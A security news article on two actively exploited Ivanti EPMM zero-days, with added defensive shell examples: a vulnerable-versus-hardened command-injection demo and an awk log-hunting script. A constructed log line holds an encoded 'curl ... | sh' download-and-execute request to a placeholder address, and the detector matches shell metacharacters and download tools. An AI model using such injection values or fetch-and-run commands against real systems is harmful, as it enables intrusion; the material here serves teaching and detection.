Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches.
“Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks,” Palo Alto Networks’ Unit 42 threat research team said in an advisory. “These vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.”
EPMM, formerly known as MobileIron Core, is a mobile device management platform that enterprises use to manage and enforce security policies on employee smartphones and tablets.
Palo Alto Networks’ attack surface management platform Cortex Xpanse found more than 4,400 EPMM instances currently exposed on the public internet. Compromise of the platform gives attackers access to device policies, credentials, and metadata across an organization’s entire mobile fleet, Unit 42 warned in the advisory.
Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to execute arbitrary commands on exposed EPMM servers without any user interaction or valid credentials.
Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. “We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” the company said in its security advisory.
Both vulnerabilities stem from unsafe Bash script handling in legacy Apache web server configurations, according to Unit 42. CVE-2026-1281 lies in the script behind the In-House Application Distribution feature; CVE-2026-1340 is the same flaw class in a separate script that handles the Android File Transfer mechanism. “Although the root cause is the same, they reside in two distinct scripts handling different features,” the advisory explained.
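“Unsafe Bash script handling” behind an Apache web server describes a command-injection class rather than a single bug: a request value reaches a shell that re-parses it. The following is an added example illustrating that class; it is not Ivanti’s code and is not derived from the vulnerable scripts. The CGI handler, its file-name parameter and the “serve a file” action are invented for the demonstration. The vulnerable handler splices the request value into a string handed to eval; the hardened one allowlists the value and passes it as a single argument to a fixed command.

```shell
# Illustrative CGI-style handler showing the flaw class ("unsafe Bash script
# handling"). Added example, not Ivanti's code; parameter and action invented.

# VULNERABLE: the request value is spliced into a command string and handed
# to eval, so shell metacharacters in the request become commands.
vulnerable_fetch() {
    # $1 would be the request parameter taken from QUERY_STRING or a POST body.
    # eval re-parses the assembled string: 'app.apk;id' runs id as the web user.
    eval "echo serving $1"
}

# HARDENED: allowlist-validate, bound the length, and pass the value as one
# quoted argument to a fixed command. Nothing re-parses it as shell.
safe_fetch() {
    # Reject anything but a short, plain basename: empty values, any character
    # outside [A-Za-z0-9._-] (which excludes ; | & $ ` / space and newline),
    # a leading '.' or '-', and any '..' sequence.
    [ "${#1}" -le 128 ] || return 1
    case "$1" in
        ''|*[!A-Za-z0-9._-]*|.*|-*|*..*) return 1 ;;
    esac
    # Fixed command, value passed as a single quoted argument.
    printf 'serving %s\n' "$1"
}

# Demo: the injected 'echo INJECTED' runs only through the vulnerable handler.
vulnerable_fetch 'app.apk;echo INJECTED'
safe_fetch 'app.apk;echo INJECTED' || echo "rejected: not a plain basename"
```

Run it with sh. The first call prints INJECTED because eval re-parses the attacker’s string; the hardened handler rejects the same input before any command runs. The allowlist is what matters here: quoting alone does not rescue a script that feeds request data to eval.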
From scan to backdoor
Unit 42 documented threat actors moving from automated scanning to initial access within a short window, then deploying persistent backdoors designed to outlast patching cycles.
After gaining initial access, attackers immediately attempted to download and execute a second-stage payload. “This second stage typically installs a web shell, a cryptominer, or a persistent backdoor to grant the attacker control of the appliance,” the advisory said.
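One practical hunt for the scan-to-backdoor chain described above is to percent-decode each request target in the appliance’s Apache access log and flag requests whose query string carries shell metacharacters or a download tool name, which is what a second-stage fetch through an injected command looks like from the web server’s side. The example below is added here and is not from Unit 42 or Ivanti; the log lines are constructed, the paths are placeholders rather than the real endpoints, and the addresses come from documentation ranges.

```shell
# Constructed Apache combined-log sample (not real telemetry). Paths and IPs
# are placeholders; the second line carries a percent-encoded "; curl ... | sh"
# in its query string.
sample_access_log() {
    cat <<'EOF'
203.0.113.5 - - [28/Jan/2026:10:14:01 +0000] "GET /cgi/example/appdist?file=app.apk HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Jan/2026:10:14:03 +0000] "GET /cgi/example/appdist?file=app.apk%3Bcurl%20http%3A%2F%2F198.51.100.7%2Fs.sh%7Csh HTTP/1.1" 200 87 "-" "python-requests/2.31"
198.51.100.23 - - [28/Jan/2026:10:15:10 +0000] "POST /example/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# Read access-log lines on stdin (or from files given as arguments), decode
# each request target, and print "<client-ip> <raw-target>" for requests whose
# decoded target contains shell metacharacters or a download tool name.
hunt_cmd_injection() {
    awk -F'"' '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Minimal percent-decoder: %XX -> byte, "+" -> space. Enough to surface
    # encoded metacharacters; not a full URL parser.
    function urldecode(s,    out, i, c, n) {
        out = ""; n = length(s)
        for (i = 1; i <= n; i++) {
            c = substr(s, i, 1)
            if (c == "%" && i + 2 <= n) {
                out = out sprintf("%c", hexval(substr(s, i + 1, 1)) * 16 + hexval(substr(s, i + 2, 1)))
                i += 2
            } else if (c == "+") {
                out = out " "
            } else {
                out = out c
            }
        }
        return out
    }
    {
        # Splitting on the double quote puts "METHOD target version" in field 2;
        # the client address is the first token of field 1.
        split($1, head, " "); split($2, req, " ")
        dec = urldecode(req[2])
        if (dec ~ /[;|&`$]/ || dec ~ /(curl|wget)/)
            print head[1], req[2]
    }' "$@"
}

# Demo: only the encoded-injection line should be reported.
sample_access_log | hunt_cmd_injection
```

Point it at a real log with `hunt_cmd_injection /var/log/httpd/access_log` (path assumed). Decoding before matching is the important step: a pattern written against the raw line misses `%3B` and `%7C`, and a single scanner will often send both encoded and plain variants.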
Unit 42 also said attackers deployed the Nezha open-source monitoring agent to maintain visibility over compromised systems.
The attackers targeted sectors including state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada, the advisory added.
Unit 42 also warned that proof-of-concept exploit code for both CVEs is already publicly available, making broader exploitation likely as more threat actors adopt working exploits.
Patch, but verify first
Unit 42 directed organizations to Ivanti’s security advisory for remediation guidance, which recommends applying version-specific RPM patches for EPMM 12.x branches that require no appliance downtime. Ivanti cautioned, however, that the RPM patch does not survive a version upgrade and must be reapplied after one. “The permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.”
Ivanti also warned in its advisory that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM holds command execution permissions on connected Sentry systems. “If an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,” Ivanti warned.
For organizations that suspect compromise, the Ivanti advisory warned against attempting to clean affected systems. Instead, it recommended restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates.
A familiar pattern
The targeting of EPMM follows a pattern that will be familiar to Ivanti customers. The product has been exploited at scale before — in 2023, state-sponsored attackers used EPMM zero-days to break into Norwegian government networks, and separate flaws were again exploited in the wild last year.
Ivanti’s Connect Secure VPN product has had a similarly troubled record, with Chinese APT groups exploiting zero-days in back-to-back campaigns that eventually led the US government to order federal agencies to disconnect Ivanti VPN products entirely in February 2024.